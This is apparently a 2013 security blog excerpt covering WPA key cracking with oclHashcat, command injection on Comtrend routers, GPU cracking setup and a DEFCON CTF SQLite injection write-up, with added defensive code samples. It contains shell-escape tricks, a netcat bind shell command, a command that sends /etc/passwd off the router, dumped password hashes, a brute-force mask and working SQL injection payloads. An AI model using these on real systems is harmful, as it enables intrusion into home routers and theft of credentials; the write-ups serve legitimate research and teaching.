Speed.GPU.#1...:   118.1k/s
Speed.GPU.#2...:   118.5k/s
Speed.GPU.#*...:   236.7k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1686405120/4294967296 (39.26%)
Rejected.......: 0/1686405120 (0.00%)
HWMon.GPU.#1...: 87% Util, 76c Temp, 70% Fan
HWMon.GPU.#2...: 92% Util, 64c Temp, 52% Fan

Started: Mon Jul 29 05:31:56 2013
Stopped: Mon Jul 29 07:38:36 2013

The third way, direct bruteforce, is surely the best:

 ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024 ../../tocrack/belkin.hccap -a 3 -1 ?dabcdef ?1?1?1?1?1?1?1?1

Finally, we have seen how an attacker could break your security at home. So please, if you have one of these routers, you should do the following:

  1. Disable the WPS feature.
  2. Change the default WPA passphrase to one chosen according to proper password policies.

I made a video summing up the process; I hope you enjoy it. I would like to congratulate the Hashcat team for the great tools they make. To be honest, we appreciate them very much.


Or the YouTube video: http://www.youtube.com/watch?v=iyJIwr6Ca3U



Comtrends (I) … Got shell?

Monday, 22 July 2013 No comments

Hi everyone, summer has finally arrived, and vacations too. I was looking for something in some Comtrend routers; unfortunately, a couple of years ago my colleague (Mambostar) and I had found out how Comtrend was generating the WPA keys of some of their routers. They forgot to delete /var/md5encode, but we could not use a normal "ls", so we had to find some way of listing the filesystem. This post is the beginning of how to bypass those restrictions, and also some methods to get a root shell, a normal shell or a reverse shell. If you find new ones, please add a comment and I'll update this post.

First of all, a quick reminder at the top of the post for those who do not want to read the whole thing.

  • Some ways to get a shell
sysinfo && sh
sysinfo ; sh
echo `command`
cat | sh (and the command you want on the next line)
echo `/bin/sh > /dev/tty`
echo *


  • How can you list files without “ls”?
for v in /* ; do echo $v ; done



  • How can you get a remote shell?

From the router:

cat | sh
/usr/bin/nc -l -p 6666 -e /bin/sh
echo `/usr/bin/nc -l -p 6666 -e /bin/sh`

From your machine/PC:

nc [IProuter] 6666


  • How can you send/receive files?
cat | sh
/usr/bin/nc -l -p 6666 < /etc/passwd
nc [IProuter] 6666 > /etc/passwd





Several examples on some of the most important Comtrend routers in Spain:

Comtrend BCM96348

dudu@w0rm~:$ telnet
Connected to
Escape character is '^]'.
BCM96348 ADSL Router
Login: 1234
> sh
sh: not found
> echo `ls`
echo `ls`: not found
> sysinfo && sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13420          492            0          876
 Swap:            0            0            0
Total:        13912        13420          492

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# exit
> sysinfo ; sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13428          484            0          876
 Swap:            0            0            0
Total:        13912        13428          484

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# help

Built-in commands:
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        date df dmesg echo expr false ifconfig init insmod kill killall
        klogd linuxrc ln logger logread md5sum mkdir mount msh ping ps
        pwd reboot rm rmmod route sendarp sh sysinfo syslogd test tftp
        tftpd top true tty vconfig

# cd /usr/bin
# ls
ls: not found
# for i in * ; do echo $i; done

Comtrend BCM96328

dudu@w0rm~:$ telnet
Connected to
Escape character is '^]'.
BCM96328 Broadband Router
Login: admin
 > sh
telnetd:error:424.175:processInput:380:unrecognized command sh
 > sysinfo ; sh
Warning: operator ; is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35032        25496            0         4232
 Swap:            0            0            0
Total:        60528        35032        25496
 > sysinfo && sh
Warning: operator & is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35056        25472            0         4232
 Swap:            0            0            0
Total:        60528        35056        25472
 > sysinfo | sh 
Number: not found
11:00pm: not found
load: not found
total: not found
Mem:: not found
Swap:: not found
Total:: not found
 > echo `ls`
bin data dev etc lib linuxrc mnt opt proc sbin sys tmp usr var webs
 > cat | sh
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
cd etc
adsl                gateway.conf        passwd              smb.conf
arl                 group               ppp                 snmp
default.cfg         inetd.conf          pppmsg              soft_bridge
dhcp                init.d              profile             sysmsg
dhcp6c.conf.sample  inittab             psk.txt             udhcpd.conf
dhcp6s.conf.sample  iproute2            racoon.conf         udhcpd.leases
dms.conf            ipsec.conf          radvd.conf.sample   vlan
dyntos.sh           ipv6_start.sample   resolv.conf         wlan
ethertypes          mdk                 rsa_host_key        wrt54g.large.ico
filesystems         modules_install     samba               wrt54g.small.ico
fstab               mtab                services


Spawn a reverse shell

A netcat listener started through the injection spawns a shell:

 > cat | sh
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
/usr/bin/nc -l -p 6666 -e /bin/sh

From our PC we can connect over netcat:

$ nc 6666 
cat /etc/passwd
support:GPTPf8y46J5uo:0:0:Technical Support:/:/bin/sh
user:3SPaREpST/DNM:0:0:Normal User:/:/bin/sh
ftpuser:MNhjJatERtE5k:0:0:user for ftp:/:/bin/sh
nobody:L60iAoNSIza8k:0:0:nobody for ftp:/:/bin/sh
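As an added defensive illustration (not code from the post or from the vendor's firmware), here is a constructed model of the denylist the telnet CLI above appears to use, next to an allowlist dispatcher that never hands the line to a shell. The command names in KNOWN_COMMANDS and the argument pattern are assumptions.

```python
import re

# Constructed model of the behaviour seen in the telnet session above; this is
# not the vendor's code. The router's CLI rejected ';' and '&' but passed '|'
# and backticks through to the shell.
DENIED_CHARS = set(";&")

# Allowlist for the arguments a fixed CLI (sysinfo, ping, ...) legitimately needs.
ARG_RE = re.compile(r"[A-Za-z0-9._:-]+")

# The only commands the CLI is meant to expose (hypothetical list).
KNOWN_COMMANDS = {"sysinfo", "ping", "exit"}


def weak_filter(line: str) -> bool:
    """Denylist check as observed: accepted unless ';' or '&' is present."""
    return not any(c in DENIED_CHARS for c in line)


def build_argv(line: str):
    """Allowlist check: return an argv list for a direct exec(), or None to reject.

    The line is never handed to 'sh -c'; the first token must be a known
    command and every argument must match ARG_RE, so '|', '`', '$(', '>'
    and newlines are rejected without having to enumerate them.
    """
    tokens = line.split()
    if not tokens or tokens[0] not in KNOWN_COMMANDS:
        return None
    if not all(ARG_RE.fullmatch(t) for t in tokens[1:]):
        return None
    return tokens


SAMPLES = [  # constructed inputs reproducing the session on the page
    "sysinfo ; sh", "sysinfo && sh", "sysinfo | sh", "echo `ls`",
    "cat | sh", "sysinfo", "ping 192.0.2.1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:18} denylist={'pass' if weak_filter(s) else 'block':5} "
              f"allowlist={build_argv(s)}")
```

The denylist lets `sysinfo | sh` and ``echo `ls` `` through exactly as the transcript shows, while the allowlist only yields an argv for `sysinfo` and `ping 192.0.2.1`.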

Finally, if you have ideas on how you would do command injection in these kinds of routers, please feel free to discuss them in the comments.

In the next entry I will discuss some important things about those routers.

Keep hacking!  Enjoy the video 😉  Can u feel it?

Categories: Networking, Wireless Tags:

Running OclHashcat-plus with 2X hd7970

Tuesday, 2 July 2013 No comments

First of all, if you have not installed the ATI drivers, you can follow this nice wiki from the Hashcat staff:


Secondly, if you are having problems, you can read this post:

# List all your cards
$ aticonfig --lsa
* 0. 01:00.0 AMD Radeon HD 7900 Series
  1. 02:00.0 AMD Radeon HD 7900 Series

* - Default adapter

These two commands can be quite useful if you are trying to use both GPU cards and they are not working together, or if you have problems with your graphics on Ubuntu when your PC boots. Even with two or more GPU cards, if you attempt to change the DVI adapter you may see something like "ERROR: clGetDeviceIDs() -1", while being completely sure that your drivers are okay, I mean the correct version of ATI Catalyst for your Hashcat version.

# Grab information with all adapters and it creates a new config file
$ sudo aticonfig --initial -f --adapter=all
$ sudo reboot


Now that the work is done and our 2 cards are working properly, we can run, for instance, a simple MD5 cracking session with one of the examples bundled with oclHashcat-plus:

Session.Name...: oclHashcat-plus
Status.........: Exhausted
Input.Base.....: Mask (?a?a?a?a)
Input.Mod......: File (example.dict)
Hash.Target....: File (example0.hash)
Hash.Type......: MD5
Time.Started...: Mon Jul  1 20:31:03 2013 (35 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...:  3176.6M/s
Speed.GPU.#2...:  2709.5M/s
Speed.GPU.#*...:  5886.1M/s
Recovered......: 2190/6494 (33.72%) Digests, 0/1 (0.00%) Salts
Progress.......: 136302297088/136302297088 (100.00%)
Rejected.......: 1981808640/136302297088 (1.45%)
HWMon.GPU.#1...: 53% Util, 69c Temp, 36% Fan
HWMon.GPU.#2...: 37% Util, 47c Temp, 10% Fan

Started: Mon Jul  1 20:31:03 2013
Stopped: Mon Jul  1 20:31:40 2013


Another thing I did was set up my conkyrc in order to watch my GPU clocks and other important things like the temperature. Unfortunately, I am not a professional password cracker and I use X11 as well, so my cracking server is quite homemade.

${color orange}HASHCAT${hr 2}$color
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=0  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=0 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=0 | egrep -i  "temperature" | awk '// {print $5}'} °C

GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=1  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=1 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=1 | egrep -i  "temperature" | awk '// {print $5}'} °C


Example of conkyrc and hashcat running at the same time


If you want to use something else, you can take a look at my repository at BitBucket

I read some tips in this link:


Categories: Bruteforce Tags:

SQLite injection: DEFCON 21 CTF Babyfirst.

Monday, 17 June 2013 No comments

This weekend was the DEFCON CTF quals; unfortunately for students it is not a great time to play CTFs. Anyway, I attempted a simple challenge from the 3dub category (web challenges).

The URL of the challenge was: http://babysfirst.shallweplayaga.me:8041


We could see a simple login with username/password. The first thing to try is a simple bypass.

Username: ' or '1'='1'-- -

Password:

And that is the result in the website:



logged in as root



Well, it works, but the flag is not here. I looked at Tamper Data and found this query in the response headers:

X-Sql=select name from users where name = '' or '1'='1' and password = '' or '1'='1' limit 1;


So, here we go, but nothing works yet; we have to guess further information, e.g. whether a UNION works and which database engine is used.

Username: ' union select 666-- -

Password:



logged in as 666



Great! We have found the injection point, and we can see the output in the web browser. I tried information_schema for MySQL, all_tables for Oracle and so on, but nothing showed up on the screen. But if we try this SQLite payload...

Username: ' union SELECT name FROM sqlite_master-- -

Password:



logged in as keys



And now it is all over with:

Username: ' union select * from keys-- -

Password:



logged in as The key is: literally online lolling on line WucGesJi
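As an added example (not the challenge's code), a constructed in-memory SQLite stand-in for the login above: the vulnerable query is built by concatenation exactly like the X-Sql header, and the parameterised version shows why the same four usernames then stop working. The table rows and flag text are made up; only the table names come from the write-up.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge database (rows and flag invented)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE keys (value TEXT);
        INSERT INTO keys VALUES ('FLAG{constructed-placeholder}');
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'constructed-root-pw'),
                                 ('alice', 'constructed-alice-pw');
    """)
    return db


def vulnerable_login(db, name: str, password: str):
    """Mirror of the X-Sql query from the write-up: user input is concatenated,
    so a quote closes the literal and '-- -' comments out the rest."""
    sql = (f"select name from users where name = '{name}' "
           f"and password = '{password}' limit 1;")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(db, name: str, password: str):
    """Same query with bound parameters: quotes and comments stay plain text."""
    sql = "select name from users where name = ? and password = ? limit 1;"
    row = db.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


PAYLOADS = [  # the four usernames from the write-up, password left empty
    "' or '1'='1'-- -",
    "' union select 666-- -",
    "' union SELECT name FROM sqlite_master-- -",
    "' union select * from keys-- -",
]

if __name__ == "__main__":
    db = build_db()
    for p in PAYLOADS:
        print(f"{p!r:45} vulnerable={vulnerable_login(db, p, '')!r} "
              f"safe={safe_login(db, p, '')!r}")
```

The sqlite_master payload returns "keys" rather than "users" because a plain UNION deduplicates its output through a sorted temporary table, which is the same ordering the challenge displayed.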



Categories: SQLinjection Tags: